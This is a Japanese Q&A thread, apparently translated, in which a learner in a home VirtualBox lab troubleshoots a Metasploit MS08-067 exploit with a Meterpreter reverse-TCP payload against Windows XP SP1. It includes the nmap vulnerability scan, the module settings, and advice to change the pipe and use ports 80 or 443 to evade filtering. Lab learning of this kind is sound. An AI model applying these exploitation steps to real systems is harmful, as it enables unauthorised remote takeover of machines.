Metasploitの使い方を学んでいます。 VirtualBoxを使用して、Kali Linux(192.168.56.101)でVMを実行し、別のWindows XP SP1(192.168.56.103)で実行しています。 2つのVMは互いにpingを実行でき、Windowsファイアウォールは無効になっています。 Kali LinuxでMetasploitを実行していて、Windows XP SP1を攻撃しようとしています。
Msfconsoleを起動して、ポートスキャンを開始します。
nmap -sT -A --script=smb-check-vulns -Pn --script-args=unsafe=1 192.168.56.103
それは私に伝えます
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
このようにパラメーターを設定します。
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.103 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.56.101 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 Windows XP SP0/SP1 Universal
次に:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.101:8080
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
No active sessions.
何が悪いのですか?
編集:Windows XP SP3 VMでも同じことを行いましたが、うまくいきました! Windows XP SP1で動作しない理由が本当にわかりません...
あなたのエクスプロイトは成功していないようです。別のペイロードを試すか、LPORTを変更してください。ファイアウォールによってポートがブロックされることがあり、リバースシェルを取得できない場合があります。そして、エクスプロイトが成功すると、すぐにリバースシェルが取得され、「sessions -l」コマンドを入力する必要はありません。
いくつかのこと:
Nmapが元のサービスをクラッシュさせた可能性があります。 NSEスクリプトのunsafe = 1パラメータは、必要に応じてクラッシュする許可を与えています。成功するための最良のチャンスを得るには、nmapとエクスプロイトの間でボックスがリブートされていることを確認してください。また、次の操作も実行できます。*ブラウザではなくSRVSVCを利用します。 * LPORTを80(または443)に設定します。これらのポートはフィルタリングされる可能性が低いためです。